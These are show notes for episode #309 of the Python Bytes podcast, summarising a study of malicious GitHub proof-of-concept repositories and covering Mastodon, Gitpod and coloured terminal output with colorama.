Python Bytes: #309 When Malware PoC's are Themselves Malware

<p><strong>Watch the live stream:</strong></p> <a href='https://www.youtube.com/watch?v=xxN5Zjf-J1E' style='font-weight: bold;'>Watch on YouTube</a><br> <br> <p><strong>About the show</strong></p> <p>Sponsored by <a href="http://pythonbytes.fm/foundershub2022"><strong>Microsoft for Startups Founders Hub</strong></a>.</p> <p><strong>Michael: #0: Python Bytes is 6 years</strong> old this week. Thank you! 🎉</p> <p><strong>Michael #1:</strong> <a href="https://portswigger.net/daily-swig/malicious-proof-of-concepts-are-exposing-github-users-to-malware-and-more"><strong>Malicious proof-of-concepts are exposing GitHub users to malware and more</strong></a></p> <ul> <li><a href="https://arxiv.org/abs/2210.08374"><strong>The paper</strong></a></li> <li>They found that of the 47,313 GitHub repositories they had downloaded and checked, 4,893 (10.3%) were malicious.</li> <li>In some the attackers were trying to plant malware on users’ machines, while in others, they tried to open backdoors using CobaltStrike, for example</li> <li>Ignoring this problem can cause damage that ranges from infecting yourself as [a] user, to infecting your company and likely your customers as well if it’s a more sophisticated attack,” El Yadmani warned.</li> <li>Languages <ul> <li>Ruby 379 </li> <li>Go 400 </li> <li>JavaScript 548 </li> <li>Shell 652 </li> <li>C++ 962</li> <li>Java 1071 </li> <li>C 1686 </li> <li><strong>Python 8305</strong> </li> <li>Undetected 31858</li> </ul></li> <li>Example Python exfile script included in the paper</li> </ul> <p><strong>Brian #2:</strong> <strong>The great Mastodon experiment</strong></p> <ul> <li>Context should be obvious re Twitter news.</li> <li>A lot of Python people have kept in touch via Twitter.</li> <li>A lot are now experimenting with <a href="https://joinmastodon.org">Mastadon</a>,</li> <li>What I did <ul> <li>asked Twitter people which server to use, then just picked fosstodon.org, but there are <a href="https://joinmastodon.org/servers">many servers</a></li> <li>This is me: <a href="https://fosstodon.org/@brianokken"><strong>@brianokken@fosstodon.org</strong></a></li> <li>Michael got in too: <strong>https://fosstodon.org/@mkennedy</strong></li> <li>just started using it, following people, trying iOS clients, etc.</li> </ul></li> <li>Now I’m ready for some tutorials, and here’s a list that looks decent: <ul> <li><a href="https://github.com/joyeusenoelle/GuideToMastodon?utm_source=pocket_saves">An Increasingly Less-Brief Guide to Mastodon</a></li> <li><a href="https://blog.djnavarro.net/posts/2022-11-03_what-i-know-about-mastodon/#etiquette-on-cross-posting-from-twitter">Everything I know about Mastodon</a> <ul> <li>A hastily written guide for data science folks trying to navigate the fediverse.</li> </ul></li> <li><a href="https://simonwillison.net/2022/Nov/8/mastodon-is-just-blogs/">Mastodon is just blogs</a> - Simon Willison is running his own server.</li> <li><a href="https://transponderings.blog/2022/05/21/eight-mastodon-apps-for-iphone/">Eight Mastodon apps for iPhone</a> - I’m currently trying like 4, but you can also just log into your sever and do everything there.</li> <li><a href="https://fedi.tips">Fedi.Tips</a> and their <a href="https://fedi.tips/mastodon-and-the-fediverse-beginners-start-here/">Beginners Start Here</a> page</li> </ul></li> </ul> <p><strong>Michael #3:</strong> <a href="https://twitter.com/titimoby/status/1585566185961263104?s=12&amp;t=4h7RIi-8kG9bjNWYyonA4Q"><strong>Gitpod and the traveling dev</strong></a></p> <ul> <li>Gitpod is an open-source Kubernetes application for ready-to-code developer environments that spins up fresh, automated dev environments for each task, in the cloud, in seconds.</li> <li>Gitpod is paid, but there are decent free tiers</li> <li><a href="https://github.com/gitpod-io/gitpod#features">Features</a></li> <li>Run a desktop or browser based version of VS Code or any JetBrains IDE and customise it to your individual needs - from themes to extensions, you have full control.</li> </ul> <p><strong>Brian #4:</strong> <strong>Color in the terminal</strong></p> <ul> <li>pytest-check currently doesn’t use color <ul> <li>but a little red for failures would be good (and was requested via an issue)</li> </ul></li> <li>I could use <a href="https://pypi.org/project/rich/">rich</a>, but maybe that’s a slightly larger hammer than I need for this job</li> <li>Maybe raw escape sequences like <code>print('\033[31m' + 'some red text')</code> <ul> <li>kinda gross</li> <li>won’t work out of the box on Windows.</li> </ul></li> <li>But <a href="https://pypi.org/project/colorama/">colorama</a> can fix Windows. <ul> <li>It just recently added <code>just_fix_windows_console()</code>, which apparently works better than <code>init()</code> in that it can be called multiple times without blowing up. </li> <li>Includes easier to read codes for some basic colors, so this works: <pre><code>from colorama import just_fix_windows_console from colorama import Fore, Style just_fix_windows_console() print(Fore.RED + 'some red text') print(Style.RESET_ALL) print('back to normal now') </code></pre></li> </ul></li> </ul> <p><strong>Extras</strong> </p> <p>Brian:</p> <ul> <li>Simon Willison wrote <a href="https://simonwillison.net/2022/Nov/6/what-to-blog-about/?utm_source=pocket_saves">What to blog about</a>, which includes <ul> <li>TIL (today I learned) posts that don’t need to be full tutorials</li> <li>Projects you’ve built</li> </ul></li> <li>I’d like to include <ul> <li>Projects in progress</li> <li>Bug fixes or feature additions where you needed to learn a bit of something beforehand <ul> <li>Example: I should write up “Adding red to pytest-check”</li> </ul></li> </ul></li> </ul> <p>Michael: </p> <ul> <li>Beanie reorg: There is no sync version here more. Please use <a href="https://github.com/roman-right/bunnet">Bunnet</a> instead</li> <li>https://twitter.com/nicholdav/status/1589643652598759424 ? </li> <li><a href="https://twitter.com/mariatta/status/1589656718635839488"><strong>PyCon Days Breakdown</strong></a></li> <li>Been playing with GeForce now, really impressive. Meanwhile, why is google still selling stadia?</li> <li>New video: <a href="https://www.youtube.com/watch?v=kmAe3VUW3zU"><strong>A Walrus Meets a Python - What is the := Walrus Operator?</strong></a></li> <li>New video: <a href="https://www.youtube.com/watch?v=p4Sn6UcFTOU"><strong>Python GC Settings - Change This and Go 20% Faster!</strong></a></li> </ul> <p><strong>Joke:</strong> <a href="https://devhumor.com/media/pure-relaxation-server-sounds"><strong>Relaxation</strong></a></p>